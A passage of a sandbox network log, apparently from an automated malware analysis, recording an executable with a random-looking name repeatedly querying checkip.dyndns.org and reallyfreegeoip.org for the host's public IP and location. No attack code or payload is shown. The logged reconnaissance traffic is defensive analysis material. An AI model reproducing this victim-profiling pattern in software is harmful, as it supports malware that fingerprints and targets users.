2	192.168.2.8	49710	193.122.130.0	80	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:42:17.315608978 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:42:19.790730953 CET	730	IN	HTTP/1.1 502 Bad Gateway Date: Sat, 11 Jan 2025 01:42:19 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 6617480e6fbdc66929eb62b71d9b0d12 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49711	193.122.130.0	80	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:42:19.833647013 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:42:20.415277004 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 05034df71c891d3c9362768813620c5e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	193.122.130.0	80	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:42:21.049113989 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:42:23.416625023 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e7a2ae8a19b83773ac9add3cc16346bd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49715	193.122.130.0	80	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:42:24.017988920 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:42:25.681204081 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 029c249c6eb3a8a3264fcbb76029cbfb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49717	193.122.130.0	80	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:42:26.325613976 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 02:42:28.056293964 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7e531adc43f3462fa830d3639f289b92 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49723	193.122.130.0	80	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:42:28.680855036 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 02:42:29.892575979 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3e4daed3680d629f5b6a9b8cb62482b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	104.21.112.1	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 01:42:15 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1874524 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VIlzQpq3dHUvcX7IByH2do9Jxcixv%2FoFtGVuXFd5Tt6%2FnQvmXXzCbCutqPPMOntLMOGyMSD%2Bsw%2Buv%2BUrLojWM0zprOt1SbXRK4oBtK72zm7HOshE5rufnMBs0C9oyE7slJkyig%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90013587fee6727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1994&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1446260&cwnd=234&unsent_bytes=0&cid=023f3efa67dae22b&ts=292&x=0"
2025-01-11 01:42:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	104.21.112.1	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:15 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 01:42:15 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1874524 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tl2n3mergY9IYzhvx4Kt4jAQy5WCznfbP3nD1eCZb%2FQYfFe4p4qpIDIQL2DAwtPl1%2BexS0XfC8vUsQ5RXNaasYyHtDEsu5rfDVhkkPWtC6nmmq7ucp5DEV2DpPXFzqR5EpVmm%2Fhq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001358c8c54424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1520&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1776155&cwnd=248&unsent_bytes=0&cid=6e4687fb91ef3ff3&ts=148&x=0"
2025-01-11 01:42:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	104.21.112.1	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:17 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 01:42:17 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1874526 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OuRlM%2FpNvpD%2FBkvJEvNQv6fmBEofPfRWnjDDq%2FBVULvTpk59W6Ae%2BsH4HpIf6X3ENyrxDaKLwjQyRVYa20itu4vnFGgtFGy1tCF2bVLlR5qS56msZsMXbRyB7b8VkydPlSqba%2F1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90013595bed4729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1915&min_rtt=1912&rtt_var=724&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1505154&cwnd=169&unsent_bytes=0&cid=af1ab01870bd09d6&ts=172&x=0"
2025-01-11 01:42:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49712	104.21.112.1	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:20 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 01:42:21 UTC	851	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1874530 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P4wHvcSd6cfAi4zg1mlPByEjQIC2M6qQVQrpAtO2K670tZUVPQVjXiJ%2FLk0OadRxYH0sbBFFQQYNU8KX3QKy7ewzkKzG7QsIibCuwCpT23PdeicjKu7CxtSxZ9nqgaMtMy6zJlOF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900135ad29e2424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1561&rtt_var=591&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1841109&cwnd=248&unsent_bytes=0&cid=0c6ab680aaf8e0a4&ts=152&x=0"
2025-01-11 01:42:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49714	104.21.112.1	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 01:42:24 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1874533 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=89hIZSpWjPc61QMiZkVpcjoLJqasif7FuhBeF2aT%2BJqu79L8vRvRvya%2BInikbSQsjDZMevsEn151%2BXI3nX3lRZQ0ThET4hIoIszcJHc4hRBiD4kesK%2FwfQsW%2FfMe1Al9l3lW8fAv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900135bfbad9424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1553&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1789215&cwnd=248&unsent_bytes=0&cid=8c3167dc3bc02f9e&ts=139&x=0"
2025-01-11 01:42:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49716	104.21.112.1	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:26 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 01:42:26 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1874535 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFkDdMNRE9GJPNJjDxd5nImCz642tEakHP1ns8l8FLvTFV6wVNf7J0%2B03V%2FFO%2F6rnh7py4C5xiOCIgphDxKc%2BMZ7xmj7rJwPkWAd97%2F0Ogveb%2Fs3nxj3F8ovebERmnY0IBrq7u9m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900135ce1ce2424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1595&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1830721&cwnd=248&unsent_bytes=0&cid=032975e985735592&ts=146&x=0"
2025-01-11 01:42:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49720	104.21.112.1	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:28 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 01:42:28 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1874537 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5SYmCLhPs4qXruwmIYnEEt4nGCGh0FTJHEh%2Fd2%2BKMdGeHxS6By%2FG7Y6Rppjt26ubuP%2Fk%2FxCq2WnL6xNeeDzBvvXE5q2S1RcVtaLpx21PJyWNf9USNAK1QtuylPCPf1Qx8EkHFKoI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900135dcddb60f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1705&rtt_var=654&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1712609&cwnd=221&unsent_bytes=0&cid=9b9a5755e22908fd&ts=159&x=0"
2025-01-11 01:42:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 